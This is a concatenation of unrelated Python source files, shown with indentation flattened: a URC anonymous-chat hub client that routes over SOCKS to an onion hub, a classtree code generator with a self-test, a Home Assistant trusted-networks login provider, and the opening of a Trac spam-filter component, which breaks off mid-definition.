with open(keyfile, 'rb') as rf:
seed = rf.read()
self.sk, self.pk, seed = nacl_keygen(seed)
else:
self.sk, self.pk, seed = nacl_keygen()
with open(keyfile, 'wb') as wf:
wf.write(seed)
def _persist_hub(self, addr):
"""
persist hub connection, connect out
"""
parts = addr.split(' ')
host, port = parts[0], int(parts[1])
con = yield from self._connect_hub(host, port)
if con is None:
self.persist_hubs[addr] = None
return
self.persist_hubs[addr] = con
def pubkey(self):
"""
get ascii representation of our public key
"""
return self.pk and bin2pubkey(self.pk) or 'not made'
def _persist_hubs(self):
"""
call every second, keep hub connections persisted
"""
for addr in self.persist_hubs:
if self.persist_hubs[addr] is None:
asyncio.async(self._persist_hub(addr), loop=self.loop)
self.loop.call_later(1, self._persist_hubs)
@asyncio.coroutine
def forward_hub_packet(self, connection, pkt, min_delay=1, max_delay=3):
"""
forward URCLINE from connection
"""
sleeptime = random.randint(100, 1000)
self.log.info("sleep {}ms".format(sleeptime))
_ = yield from asyncio.sleep(float(sleeptime) / 1000.0, loop=self.loop)
for k in self.persist_hubs:
con = self.persist_hubs[k]
if con is not 0 and con is not None:
if con != connection:
asyncio.async(con.send_hub_packet(pkt), loop=self.loop)
for con in self.hubs:
if con != connection:
asyncio.async(con.send_hub_packet(pkt), loop=self.loop)
def broadcast(self, urcline):
"""
send urcline to all connection
"""
if isinstance(urcline, str):
urcline = urcline.encode('utf-8')
self.log.info('broadcast {}'.format(urcline))
msgtype = URC_PLAIN
sig = bytearray()
if self.sign:
msgtype = URC_PY_SIGN
sig = nacl_sign(self.sk, urcline)
pktdata = mk_hubpkt(urcline, msgtype) + sig
self._urc_cache.add(pktdata)
asyncio.async(self.forward_hub_packet(None, pktdata), loop=self.loop)
def _new_hub_connection(self, r, w):
"""
called when we got a new hub connection
"""
con = urc_hub_connection(self, r, w)
asyncio.async(self._get_hub_packet(con), loop=self.loop)
return con
def _socks_handshake(self, r, w, host, port):
"""
do socks v5 handshake
"""
w.write(b'\x05\x01\x00')
_ = yield from w.drain()
data = yield from r.readexactly(2)
self.log.debug('read handshake %r' % data)
req = struct.pack('!BBBBB', 5, 1, 0, 3, len(host))
req += host.encode('utf-8')
req += struct.pack('!H', port)
self.log.debug('write request %r' % req)
w.write(req)
_ = yield from w.drain()
self.log.debug('read response %d bytes' % len(req))
data = yield from r.readexactly(4)
if data[3] == 1:
_ = yield from r.readexactly(4)
else:
self.log.debug('wtf?')
w.close()
port = yield from r.readexactly(2)
self.log.debug(struct.unpack('!H', port))
return data[1] == 0
def _connect_hub(self, host, port):
"""
connect out to a hub
"""
hub = '{} {}'.format(host, port)
self.persist_hubs[hub] = 0
prnt('connecting to hub at {} port {}'.format(host, port))
if hasattr(self, 'use_socks') and self.use_socks:
r, w = yield from asyncio.open_connection(self.socks_host, int(self.socks_port), loop=self.loop)
result = yield from self._socks_handshake(r, w, host, int(port))
self.log.debug('socks = {}'.format(result))
else:
try:
r, w = yield from asyncio.open_connection(host, int(port), loop=self.loop)
except Exception as e:
prnt('error connecting to {} {} {}'.format(host, port, e))
return
else:
result = True
if result is True:
prnt('connected to hub at {} port {}'.format(host, port))
con = self._new_hub_connection(r, w)
con.addr = hub
return con
else:
prnt('connection to hub at {} port {} failed'.format(host, port))
w.close()
def disconnected(self, con):
"""
urc hub has disconnected
"""
prnt ('hub connection to {} lost'.format(con.addr))
self.log.info('hub disconnceted')
if con.addr in self.persist_hubs:
self.persist_hubs[con.addr] = None
if con in self.hubs:
self.hubs.remove(con)
def connect_hub(self, host, port):
"""
add urc hub to peristed hub connections
"""
self.log.info('connect to hub at {} port {}'.format(host, port))
self.persist_hubs['{} {}'.format(host,port)] = None
def disconnect(self):
self.loop.call_soon(self._disconnnect_all)
def _disconnnect_all(self):
hub_keys = list(self.persist_hubs.keys())
for key in hub_keys:
self._remove_hub(key)
def disconnect_hub(self, host, port):
self.loop.call_soon(self._remove_hub, "{} {}".format(host, port))
def _remove_hub(self, name):
if name in self.persist_hubs:
hub = self.persist_hubs[name]
if hub:
hub.close()
del self.persist_hubs[name]
prnt("disconnected from {}".format(name))
def _incoming_hub(self, r, w):
"""
incoming hub connection
"""
self.log.info('incoming hub connection')
con = self._new_hub_connection(r, w)
con.addr = None
self.hubs.append(con)
def bind_ircd(self, host, port):
"""
bind ircd to host:port
"""
if self.ircd:
asyncio.async(asyncio.start_server(self.ircd.incoming_connection, host, port), loop=self.loop)
self.log.info('bind ircd to {} port {}'.format(host,port))
def bind_hub(self, host, port):
"""
bind server to host:port
"""
asyncio.async(asyncio.start_server(self._incoming_hub, host, port), loop=self.loop)
self.log.info('bind hub to {} port {}'.format(host,port))
def get_pubkeys(self, fname='pubkeys.txt'):
"""
get list of public keys
"""
if os.path.exists(fname):
with open(fname) as f:
for line in f.read().split('\n'):
yield line.strip()
def _get_hub_packet(self, con):
"""
obtain a hub packet
"""
try:
self.log.debug('get packet')
pkt = yield from con.get_hub_packet()
if pkt:
raw, data, pkttype, tstamp = pkt
else:
return
except:
con.close()
self.disconnected(con)
raise
else:
asyncio.async(self._handle_hub_packet(con, raw, data, pkttype, tstamp), loop=self.loop)
def _bad_timestamp(self, tstamp, dlt=128):
"""
return true if timestamp is too old or too new
"""
nowsec, nownano = taia96n()
thensec, thennano = tstamp
if abs(nowsec - thensec) > dlt:
self.log.debug(nowsec - thensec)
return True
return False
def set_proxy(self, host, port):
"""
set socks proxy
"""
self.socks_host = host
self.socks_port = port
self.use_socks = True
def urc_activity(self, src, cmd, dst, msg):
"""
called when we got a message from urc
"""
if self.ircd:
self.ircd.urc_activity(src, cmd, dst, msg)
if self.gui:
if dst and dst[0] in ['#', '&', '+', '$']:
ctx = self.gui.find_context(channel=dst)
if ctx:
ev = "Channel Message"
if cmd != "PRIVMSG":
ctx.prnt(":{} {} {} :{}".format(src, cmd, dst, msg))
else:
src = src.split("!")[0]
ctx.emit_print(ev, "<<{}>>".format(src), msg, "")
@asyncio.coroutine
def _handle_hub_packet(self, con, raw, data, pkttype, tstamp):
"""
process hub packet
"""
self.log.debug('handle packet')
if self._bad_timestamp(tstamp):
self.log.info('bad timestamp')
elif raw not in self._urc_cache:
self._urc_cache.add(raw)
pubkey = None
if pkttype == URC_SIGN:
sig = raw[0-_SIG_SIZE:]
body = data
self.log.debug('urcsign sig={}, body={}'.format(sig, body))
if pkttype == URC_PY_SIGN:
sig = data[0-_SIG_SIZE:]
body = raw[:0-_SIG_SIZE]
self.log.debug('sig is %s' % [sig])
self.log.debug('body is %s' % [body])
for key in self.get_pubkeys():
self.log.debug('try key {}'.format(key))
try:
pkey = pubkey2bin(key)
nacl_verify(body, sig, pkey)
pubkey = key
self.log.debug('we are %s' % pubkey)
data = data[:0-_SIG_SIZE]
break
except Exception as e:
self.log.debug('not key {} because {}'.format(key, e))
continue
if pkttype == URC_PY_SIGN and pubkey is None:
data = data[:0-_SIG_SIZE]
try:
_data = data.decode('utf-8')
except UnicodeDecodeError:
pass
else:
parsed = parse_urcline(_data)
if parsed:
src, cmd, dst, msg = parsed
if pubkey == None and pkttype == URC_PY_SIGN:
src = 'fakeuser!lamer@spoof'
self.urc_activity(src, cmd, dst, msg)
asyncio.async(self.forward_hub_packet(con, raw), loop=self.loop)
asyncio.async(self._get_hub_packet(con), loop=self.loop)
def get_log_lvl(lvl):
"""
get logging level via string
"""
lvl = lvl.lower()
if lvl == 'debug':
return logging.DEBUG
if lvl == 'info':
return logging.INFO
if lvl == 'warn':
return logging.WARN
if lvl == 'error':
return logging.ERROR
def urc_broadcast_hexchat(word, word_eol, userdata):
chnl = hexchat.get_info("channel")
if chnl:
nick = hexchat.get_info("nick")
if nick is None or len(nick) == 0:
nick = "anon"
try:
userdata.broadcast(':{}!hexchat@urc.py.tld PRIVMSG {} :{}\n'.format(nick, chnl, word_eol[0]))
except Exception as e:
prnt("error in urc: {}".format(e))
def urc_command_hexchat(word, word_eol, userdata):
if len(word) < 2:
prnt("invalid use of urc command")
return hexchat.EAT_ALL
cmd = word[1]
if cmd == "proxy":
if len(word) > 2:
host = word[2]
if len(word) > 3:
try:
port = int(word[3])
except ValueError:
prnt("invalid proxy port: {}".format(word[3]))
return hexchat.EAT_ALL
prnt("set proxy to {}:{}".format(host, port))
userdata.set_proxy(host, port)
if cmd == "connect":
host = ""
port = 6789
if len(word) > 2:
host = word[2]
if len(word) > 3:
try:
port = int(word[3])
except ValueError:
prnt("invalid port: {}".format(word[3]))
return hexchat.EAT_ALL
if len(host) > 0:
userdata.connect_hub(host, port)
else:
prnt("cannot connect, no hub specificed")
return hexchat.EAT_ALL
elif cmd == "msg":
urc_broadcast_hexchat(word[1:], word_eol[1:], userdata)
return hexchat.EAT_ALL
elif cmd == "disconnect":
if len(word) == 2:
userdata.disconnect()
elif len(word) > 2:
host = word[2]
port = 6789
if len(word) > 3:
try:
port = int(word[3])
except ValueError:
prnt("invalid port: {}".format(word[3]))
return hexchat.EAT_ALL
userdata.disconnect_hub(host, port)
return hexchat.EAT_ALL
def urc_unload_hexchat(userdata):
try:
userdata.loop.close()
except Exception as e:
prnt("error unloading urc: {}".format(e))
if hexchat:
urcd = URCD(False, 'hexchat', False, False)
urcd.gui = hexchat
urcd.set_proxy("127.0.0.1", 9150)
hexchat.hook_command('', urc_broadcast_hexchat, urcd)
hexchat.hook_command('urc', urc_command_hexchat, urcd)
hexchat.hook_unload(urc_unload_hexchat, urcd)
def runhub(urc):
prnt("starting up URC HUB")
urc.loop = asyncio.new_event_loop()
try:
urc.start()
urc.loop.run_forever()
except Exception as e:
prnt("error in urc mainloop: {}".format(e))
threading.Thread(target=runhub, args=(urcd,)).start()
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('--log', type=str, default='warn')
ap.add_argument('--irc', type=str, default='127.0.0.1')
ap.add_argument('--irc-port', type=int, default=6667)
ap.add_argument('--no-socks', action='store_const', const=True, default=False)
ap.add_argument('--socks-host', type=str, default='127.0.0.1')
ap.add_argument('--socks-port', type=str, default=9150)
ap.add_argument('--remote-hub', type=str, default='allyour4nert7pkh.onion')
ap.add_argument('--remote-hub-port', type=int, default=6789)
ap.add_argument('--hubs-file', type=str, default=None)
ap.add_argument('--hub', type=str, default='127.0.0.1')
ap.add_argument('--hub-port', type=int, default=6789)
ap.add_argument('--sign',type=str, default='no')
ap.add_argument('--name', type=str, default='urc.py')
ap.add_argument('--no-anon', action='store_const', const=True, default=False)
ap.add_argument('--ircd-config', type=str, default=None)
args = ap.parse_args()
loglvl = get_log_lvl(args.log) or logging.WARN
logging.basicConfig(level = loglvl, format='%(asctime)s [%(levelname)s] %(name)s : %(message)s')
urcd = URCD(sign=args.sign.lower() == 'yes', name=args.name)
urcd.use_socks = not args.no_socks
if urcd.use_socks:
urcd.socks_host = args.socks_host
urcd.socks_port = args.socks_port
try:
urcd.bind_ircd(args.irc, args.irc_port)
if args.no_anon:
urcd.ircd.anon = False
urcd.connect_hub(args.remote_hub, args.remote_hub_port)
if args.hub:
urcd.bind_hub(args.hub, args.hub_port)
if args.hubs_file:
with open(args.hubs_file) as f:
for line in f:
line = line.replace(' ', '').replace('\n', '').replace('\r', '')
if len(line) == 0 or line[0] == '#':
continue
parts = line.split(':')
host = parts[0]
port = 6789
if len(parts) == 2:
port = int(parts[1])
urcd.connect_hub(host, port)
urcd.start()
urcd.loop.run_forever()
finally:
urcd.loop.close()
if __name__ == '__main__':
if hexchat:
pass
else:
main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Usage example::
>>> from angora.baseclass.classtree import gencode
>>> gencode(data, "example.py")
"""
from __future__ import print_function
import datetime
import sys
import os
try:
from . import nameddict
except SystemError:
from angora.baseclass import nameddict
if sys.version_info[0] == 3:
_str_type = str
_int_type = (int,)
else:
_str_type = basestring
_int_type = (int, long)
class Base(nameddict.Base):
"""
"""
def _getattr_by_key_value(self, key):
def getattr_by_key_value(value):
return getattr(self, "%s____%s" % (key, value))
return getattr_by_key_value
def __getattr__(self, attr):
if attr.startswith("getattr_by_"):
key = attr.replace("getattr_by_", "")
return self._getattr_by_key_value(key)
else:
return object.__getattribute__(self, attr)
def keys(self):
return [key for key, value in self.items()]
def values(self):
return [value for key, value in self.items()]
def items(self):
items = list()
for attr, value in self.__dict__.items():
if "____" not in attr:
items.append((attr, value))
return sorted(items, key=lambda x: x[0])
def to_dict(self):
return self.__dict__
def serialize(self):
d = {"classname": self.__class__.__name__, "metadata": dict()}
uuid_set = set()
for attr, value in self.items():
if "____" not in attr:
d["metadata"][attr] = value
else:
_id = id(value)
if _id not in uuid_set:
try:
d["subclass"].append(value.serialize())
except:
d["subclass"] = [value.serialize(),]
uuid_set.add(_id)
return d
class CodeGenerator(object):
"""Worker class
"""
def __init__(self, tab=" ", indent=0):
self.Tab = tab
self.Tab2 = tab * 2
self.indent = indent
self.basename = "classtree.Base"
self._classes = dict()
self.classes = set()
self.lines = [
"#!/usr/bin/env python",
"# -*- coding: utf-8 -*-",
"",
"import datetime",
"from angora.baseclass import classtree",
]
def reset(self):
self._classes = dict()
self.classes = set()
self.lines = [
"#!/usr/bin/env python",
"# -*- coding: utf-8 -*-",
"",
"import datetime",
"from angora.baseclass import classtree",
]
def pre_process(self, class_data):
classname = self.formatted_classname(class_data["classname"])
self._classes[classname] = set()
for key in class_data.get("metadata", dict()):
self._classes[classname].add(key)
for subclass_data in class_data.get("subclass", list()):
self.pre_process(subclass_data)
def sort_metadata(self):
for k, v in self._classes.items():
self._classes[k] = list(v)
self._classes[k].sort()
@property
def code(self):
return "\n".join([self.Tab * self.indent + line for line in self.lines])
def formatted_classname(self, text):
return text[0].upper() + text[1:]
def formatted_instancename(self, text):
return text[0].lower() + text[1:]
def sorted_dict(self, d):
return sorted(d.items(), key=lambda x: x[0], reverse=False)
def repr_def_class(self, class_data):
"""Create code like this::
class Person(Base):
def __init__(self, person_id=None, name=None):
self.person_id = person_id
self.name = name
"""
classname = self.formatted_classname(class_data["classname"])
if classname not in self.classes:
self.lines.append("")
self.lines.append("class %s(%s):" % (classname, self.basename))
kwargs = list()
setattr_arguments = list()
for attr in self._classes[classname]:
kwargs.append("%s=None" % attr)
setattr_arguments.append(
self.Tab2 + "self.%s = %s" % (attr, attr))
if len(kwargs):
line = self.Tab + "def __init__(self, %s):" % ", ".join(kwargs)
else:
line = self.Tab + "def __init__(self):"
self.lines.append(line)
for setattr_argument in setattr_arguments:
self.lines.append(setattr_argument)
if len(setattr_arguments):
self.lines.append("")
self.classes.add(classname)
def repr_new_instance(self, class_data):
"""Create code like this::
person = Person(name='Jack', person_id=1)
"""
classname = self.formatted_classname(class_data["classname"])
instancename = self.formatted_instancename(class_data["classname"])
arguments = list()
for key, value in self.sorted_dict(class_data.get("metadata", dict())):
arguments.append("%s=%r" % (key, value))
return "%s = %s(%s)" % (
instancename, classname, ", ".join(arguments))
def repr_setattr(self, class_data):
"""Create code like this::
person = Person(name='Jack', person_id=1)
self.name____Jack = person
self.person_id____1 = person
person = Person(name='Paul', person_id=2)
self.name____Paul = person
self.person_id____2 = person
"""
def get_indexable_attributes(class_data):
def isvalid(text):
for char in r"""~`!#%^&*()+=[]{}|\:;"'/.,<> """:
if char in text:
return False
return True
indexable_attributes = list()
for key, value in class_data.get("metadata", dict()).items():
if isinstance(value, _int_type):
indexable_attributes.append(key)
elif isinstance(value, _str_type):
if isvalid(value):
indexable_attributes.append(key)
return indexable_attributes
if "subclass" in class_data:
for subclass_data in class_data["subclass"]:
instancename = self.formatted_instancename(subclass_data["classname"])
self.lines.append(self.Tab2 + self.repr_new_instance(subclass_data))
indexable_attributes = get_indexable_attributes(subclass_data)
for key, value in self.sorted_dict(subclass_data.get("metadata", dict())):
if key in indexable_attributes:
if isinstance(value, _int_type):
if value < 0:
self.lines.append(self.Tab2 + "self.%s____neg%s = %s" % (
key, -value, instancename))
else:
self.lines.append(self.Tab2 + "self.%s____%s = %s" % (
key, value, instancename))
else:
self.lines.append(self.Tab2 + "self.%s____%s = %s" % (
key, value, instancename))
self.lines.append(self.Tab2)
def repr_class_data(self, class_data):
"""Create code like this::
class Person(classtree.Base):
def __init__(self, name=None, person_id=None):
self.name = name
self.person_id = person_id
class PersonCollection(classtree.Base):
def __init__(self, collection_id=None, create_date=None, name=None):
self.collection_id = collection_id
self.create_date = create_date
self.name = name
person = Person(name='Jack', person_id=1)
self.name____Jack = person
self.person_id____1 = person
person = Person(name='Paul', person_id=2)
self.name____Paul = person
self.person_id____2 = person
"""
if "subclass" in class_data:
for subclass_data in class_data["subclass"]:
self.repr_class_data(subclass_data)
self.repr_def_class(class_data)
self.repr_setattr(class_data)
def gencode(data, output=None, tab=" ", indent=0, overwrite=False):
"""Generate code.
:param data: must be list of class data, see a valid data example below
:param output: default None, the python script file name you want to create
:param tab: default " "
:param indent: global indent setting
:param overwrite: if True, silently overwrite the output file
::
data = [
{
"classname": "Database",
"metadata": {"db_id": 1, "name": "Database"},
"subclass": [
{
"classname": "PersonCollection",
"metadata": {"collection_id": 1, "name": "Person", "create_date": datetime.date(2016, 1, 8)},
"subclass": [
{
"classname": "Person",
"metadata": {"person_id": 1, "name": "Jack"},
},
{
"classname": "Person",
"metadata": {"person_id": 2, "name": "Paul"},
},
],
},
{
"classname": "DepartmentCollection",
"metadata": {"collection_id": 2, "name": "Department", "create_date": datetime.date(2016, 1, 1)},
"subclass": [
{
"classname": "Department",
"metadata": {"department_id": 1, "name": "IT"},
},
{
"classname": "Department",
"metadata": {"department_id": 2, "name": "HR"},
},
]
},
],
},
]
"""
codegen = CodeGenerator(tab=tab, indent=indent)
if isinstance(data, list):
for class_data in data:
codegen.pre_process(class_data)
codegen.sort_metadata()
codegen.repr_class_data(class_data)
for class_data in data:
codegen.lines.append("")
codegen.lines.append("%s" % codegen.repr_new_instance(class_data))
elif isinstance(data, dict):
codegen.pre_process(data)
codegen.repr_class_data(data)
codegen.lines.append("")
codegen.lines.append("%s" % codegen.repr_new_instance(data))
if output:
if not overwrite:
if os.path.exists(output):
raise FileExistsError("%r" % output)
with open(output, "wb") as f:
f.write(codegen.code.encode("utf-8"))
else:
print(codegen.code)
if __name__ == "__main__":
import unittest
from pprint import pprint as ppt
data = [
{
"classname": "Database",
"metadata": {"db_id": 1, "name": "Database"},
"subclass": [
{
"classname": "PersonCollection",
"metadata": {"collection_id": 1, "name": "Person", "create_date": datetime.date(2016, 1, 8)},
"subclass": [
{
"classname": "Person",
"metadata": {"person_id": 1, "name": "Jack"},
},
{
"classname": "Person",
"metadata": {"person_id": 2, "name": "Paul"},
},
],
},
{
"classname": "DepartmentCollection",
"metadata": {"collection_id": 2, "name": "Department", "create_date": datetime.date(2016, 1, 1)},
"subclass": [
{
"classname": "Department",
"metadata": {"department_id": 1, "name": "IT"},
},
{
"classname": "Department",
"metadata": {"department_id": 2, "name": "HR"},
},
]
},
],
},
]
gencode(data[0]["subclass"][0], indent=0, overwrite=True)
class Unittest(unittest.TestCase):
def test_all(self):
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from angora.baseclass import classtree
class Person(classtree.Base):
def __init__(self, name=None, person_id=None):
self.name = name
self.person_id = person_id
class PersonCollection(classtree.Base):
def __init__(self, collection_id=None, create_date=None, name=None):
self.collection_id = collection_id
self.create_date = create_date
self.name = name
person = Person(name='Jack', person_id=1)
self.name____Jack = person
self.person_id____1 = person
person = Person(name='Paul', person_id=2)
self.name____Paul = person
self.person_id____2 = person
class Department(classtree.Base):
def __init__(self, department_id=None, name=None):
self.department_id = department_id
self.name = name
class DepartmentCollection(classtree.Base):
def __init__(self, collection_id=None, create_date=None, name=None):
self.collection_id = collection_id
self.create_date = create_date
self.name = name
department = Department(department_id=1, name='IT')
self.department_id____1 = department
self.name____IT = department
department = Department(department_id=2, name='HR')
self.department_id____2 = department
self.name____HR = department
class Database(classtree.Base):
def __init__(self, db_id=None, name=None):
self.db_id = db_id
self.name = name
personCollection = PersonCollection(collection_id=1, create_date=datetime.date(2016, 1, 8), name='Person')
self.collection_id____1 = personCollection
self.name____Person = personCollection
departmentCollection = DepartmentCollection(collection_id=2, create_date=datetime.date(2016, 1, 1), name='Department')
self.collection_id____2 = departmentCollection
self.name____Department = departmentCollection
database = Database(db_id=1, name='Database')
# ppt(database.serialize())
# Test IDLE auto-complete support
# self.assertEqual(database.collection_id____1.collection_id, 1)
# self.assertEqual(database.collection_id____2.collection_id, 2)
# self.assertEqual(database.name____Person.name, "Person")
# self.assertEqual(database.name____Department.name, "Department")
#
# self.assertEqual(database.collection_id____1.person_id____1.person_id, 1)
# self.assertEqual(database.collection_id____1.person_id____2.person_id, 2)
# self.assertEqual(database.collection_id____1.name____Jack.name, "Jack")
# self.assertEqual(database.collection_id____1.name____Paul.name, "Paul")
#
# # Test getattr_by method
# self.assertEqual(database.getattr_by_collection_id(1).collection_id, 1)
# self.assertEqual(database.getattr_by_name("Person").name, "Person")
unittest.main()
|
|
"""Trusted Networks auth provider.
It shows list of users if access from trusted network.
Abort login flow if not access from trusted network.
"""
from __future__ import annotations
from collections.abc import Mapping
from ipaddress import (
IPv4Address,
IPv4Network,
IPv6Address,
IPv6Network,
ip_address,
ip_network,
)
from typing import Any, Dict, List, Union, cast
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from . import AUTH_PROVIDER_SCHEMA, AUTH_PROVIDERS, AuthProvider, LoginFlow
from .. import InvalidAuthError
from ..models import Credentials, RefreshToken, UserMeta
# mypy: disallow-any-generics
IPAddress = Union[IPv4Address, IPv6Address]
IPNetwork = Union[IPv4Network, IPv6Network]
CONF_TRUSTED_NETWORKS = "trusted_networks"
CONF_TRUSTED_USERS = "trusted_users"
CONF_GROUP = "group"
CONF_ALLOW_BYPASS_LOGIN = "allow_bypass_login"
CONFIG_SCHEMA = AUTH_PROVIDER_SCHEMA.extend(
{
vol.Required(CONF_TRUSTED_NETWORKS): vol.All(cv.ensure_list, [ip_network]),
vol.Optional(CONF_TRUSTED_USERS, default={}): vol.Schema(
# we only validate the format of user_id or group_id
{
ip_network: vol.All(
cv.ensure_list,
[
vol.Or(
cv.uuid4_hex,
vol.Schema({vol.Required(CONF_GROUP): cv.uuid4_hex}),
)
],
)
}
),
vol.Optional(CONF_ALLOW_BYPASS_LOGIN, default=False): cv.boolean,
},
extra=vol.PREVENT_EXTRA,
)
class InvalidUserError(HomeAssistantError):
"""Raised when try to login as invalid user."""
@AUTH_PROVIDERS.register("trusted_networks")
class TrustedNetworksAuthProvider(AuthProvider):
"""Trusted Networks auth provider.
Allow passwordless access from trusted network.
"""
DEFAULT_TITLE = "Trusted Networks"
@property
def trusted_networks(self) -> list[IPNetwork]:
"""Return trusted networks."""
return cast(List[IPNetwork], self.config[CONF_TRUSTED_NETWORKS])
@property
def trusted_users(self) -> dict[IPNetwork, Any]:
"""Return trusted users per network."""
return cast(Dict[IPNetwork, Any], self.config[CONF_TRUSTED_USERS])
@property
def trusted_proxies(self) -> list[IPNetwork]:
"""Return trusted proxies in the system."""
if not self.hass.http:
return []
return [
ip_network(trusted_proxy)
for trusted_proxy in self.hass.http.trusted_proxies
]
@property
def support_mfa(self) -> bool:
"""Trusted Networks auth provider does not support MFA."""
return False
async def async_login_flow(self, context: dict[str, Any] | None) -> LoginFlow:
"""Return a flow to login."""
assert context is not None
ip_addr = cast(IPAddress, context.get("ip_address"))
users = await self.store.async_get_users()
available_users = [
user for user in users if not user.system_generated and user.is_active
]
for ip_net, user_or_group_list in self.trusted_users.items():
if ip_addr not in ip_net:
continue
user_list = [
user_id for user_id in user_or_group_list if isinstance(user_id, str)
]
group_list = [
group[CONF_GROUP]
for group in user_or_group_list
if isinstance(group, dict)
]
flattened_group_list = [
group for sublist in group_list for group in sublist
]
available_users = [
user
for user in available_users
if (
user.id in user_list
or any(group.id in flattened_group_list for group in user.groups)
)
]
break
return TrustedNetworksLoginFlow(
self,
ip_addr,
{user.id: user.name for user in available_users},
self.config[CONF_ALLOW_BYPASS_LOGIN],
)
async def async_get_or_create_credentials(
self, flow_result: Mapping[str, str]
) -> Credentials:
"""Get credentials based on the flow result."""
user_id = flow_result["user"]
users = await self.store.async_get_users()
for user in users:
if user.id != user_id:
continue
if user.system_generated:
continue
if not user.is_active:
continue
for credential in await self.async_credentials():
if credential.data["user_id"] == user_id:
return credential
cred = self.async_create_credentials({"user_id": user_id})
await self.store.async_link_user(user, cred)
return cred
# We only allow login as exist user
raise InvalidUserError
async def async_user_meta_for_credentials(
self, credentials: Credentials
) -> UserMeta:
"""Return extra user metadata for credentials.
Trusted network auth provider should never create new user.
"""
raise NotImplementedError
@callback
def async_validate_access(self, ip_addr: IPAddress) -> None:
"""Make sure the access from trusted networks.
Raise InvalidAuthError if not.
Raise InvalidAuthError if trusted_networks is not configured.
"""
if not self.trusted_networks:
raise InvalidAuthError("trusted_networks is not configured")
if not any(
ip_addr in trusted_network for trusted_network in self.trusted_networks
):
raise InvalidAuthError("Not in trusted_networks")
if any(ip_addr in trusted_proxy for trusted_proxy in self.trusted_proxies):
raise InvalidAuthError("Can't allow access from a proxy server")
@callback
def async_validate_refresh_token(
self, refresh_token: RefreshToken, remote_ip: str | None = None
) -> None:
"""Verify a refresh token is still valid."""
if remote_ip is None:
raise InvalidAuthError(
"Unknown remote ip can't be used for trusted network provider."
)
self.async_validate_access(ip_address(remote_ip))
class TrustedNetworksLoginFlow(LoginFlow):
"""Handler for the login flow."""
def __init__(
self,
auth_provider: TrustedNetworksAuthProvider,
ip_addr: IPAddress,
available_users: dict[str, str | None],
allow_bypass_login: bool,
) -> None:
"""Initialize the login flow."""
super().__init__(auth_provider)
self._available_users = available_users
self._ip_address = ip_addr
self._allow_bypass_login = allow_bypass_login
async def async_step_init(
self, user_input: dict[str, str] | None = None
) -> FlowResult:
"""Handle the step of the form."""
try:
cast(
TrustedNetworksAuthProvider, self._auth_provider
).async_validate_access(self._ip_address)
except InvalidAuthError:
return self.async_abort(reason="not_allowed")
if user_input is not None:
return await self.async_finish(user_input)
if self._allow_bypass_login and len(self._available_users) == 1:
return await self.async_finish(
{"user": next(iter(self._available_users.keys()))}
)
return self.async_show_form(
step_id="init",
data_schema=vol.Schema(
{vol.Required("user"): vol.In(self._available_users)}
),
)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005-2012 Edgewall Software
# Copyright (C) 2005-2006 Matthew Good <trac@matt-good.net>
# Copyright (C) 2006 Christopher Lenz <cmlenz@gmx.de>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://projects.edgewall.com/trac/.
#
# Author: Matthew Good <trac@matt-good.net>
# Christopher Lenz <cmlenz@gmx.de>
import time
from StringIO import StringIO
from difflib import SequenceMatcher
from pkg_resources import resource_filename
from trac.config import BoolOption, ConfigSection, ExtensionOption, IntOption
from trac.core import Component, ExtensionPoint, implements
from trac.db import DatabaseManager
from trac.env import IEnvironmentSetupParticipant, ISystemInfoProvider
from trac.perm import IPermissionRequestor
from trac.util import get_pkginfo, as_int
from trac.util.html import tag
from trac.util.text import shorten_line, to_unicode
from trac.web.api import Request
from tracspamfilter.api import (
IFilterStrategy, IRejectHandler, RejectContent,
_, N_, add_domain, get_strategy_name, gettext, tag_)
from tracspamfilter.filters.trapfield import TrapFieldFilterStrategy
from tracspamfilter.model import LogEntry, Statistics, schema, \
schema_version, schema_version_name
class FilterSystem(Component):
"""The central component for spam filtering. Must be enabled always to allow
filtering of spam.
"""
strategies = ExtensionPoint(IFilterStrategy)
implements(IEnvironmentSetupParticipant, IPermissionRequestor,
IRejectHandler, ISystemInfoProvider)
min_karma = IntOption('spam-filter', 'min_karma', '0',
"""The minimum score required for a submission to be allowed.""",
doc_domain='tracspamfilter')
authenticated_karma = IntOption('spam-filter', 'authenticated_karma', '20',
"""The karma given to authenticated users, in case
`trust_authenticated` is false.""", doc_domain='tracspamfilter')
logging_enabled = BoolOption('spam-filter', 'logging_enabled', 'true',
"""Whether all content submissions and spam filtering activity should
be logged to the database.""", doc_domain='tracspamfilter')
nolog_obvious = BoolOption('spam-filter', 'nolog_obvious', 'false',
"""Don't log obvious spam (Bayes >90%%, marked as spam and not
authenticated) to the database.""", doc_domain='tracspamfilter')
purge_age = IntOption('spam-filter', 'purge_age', '7',
"""The number of days after which log entries should be purged.""",
doc_domain='tracspamfilter')
use_external = BoolOption('spam-filter', 'use_external', 'true',
"""Allow usage of external services.""", doc_domain='tracspamfilter')
skip_external = IntOption('spam-filter', 'skip_external', '20',
"""Skip external calls when this negative karma is already reached
by internal tests.""", doc_domain='tracspamfilter')
skip_externalham = IntOption('spam-filter', 'skip_externalham', '30',
"""Skip external calls when this positive karma is already reached
by internal tests.""", doc_domain='tracspamfilter')
stop_external = IntOption('spam-filter', 'stop_external', '50',
"""Stop external calls when this negative karma is reached.""",
doc_domain='tracspamfilter')
stop_externalham = IntOption('spam-filter', 'stop_externalham', '50',
"""Stop external calls when this positive karma is reached.""",
doc_domain='tracspamfilter')
train_external = BoolOption('spam-filter', 'train_external', 'true',
"""Allow training of external services.""", doc_domain='tracspamfilter')
trust_authenticated = BoolOption('spam-filter', 'trust_authenticated',
'false',
"""Whether content submissions by authenticated users should be trusted
without checking for potential spam or other abuse.""",
doc_domain='tracspamfilter')
attachment_karma = IntOption('spam-filter', 'attachment_karma', '0',
"""The karma given to attachments.""", doc_domain='tracspamfilter')
register_karma = IntOption('spam-filter', 'register_karma', '0',
"""The karma given to registrations.""", doc_domain='tracspamfilter')
reject_handler = ExtensionOption('spam-filter', 'reject_handler',
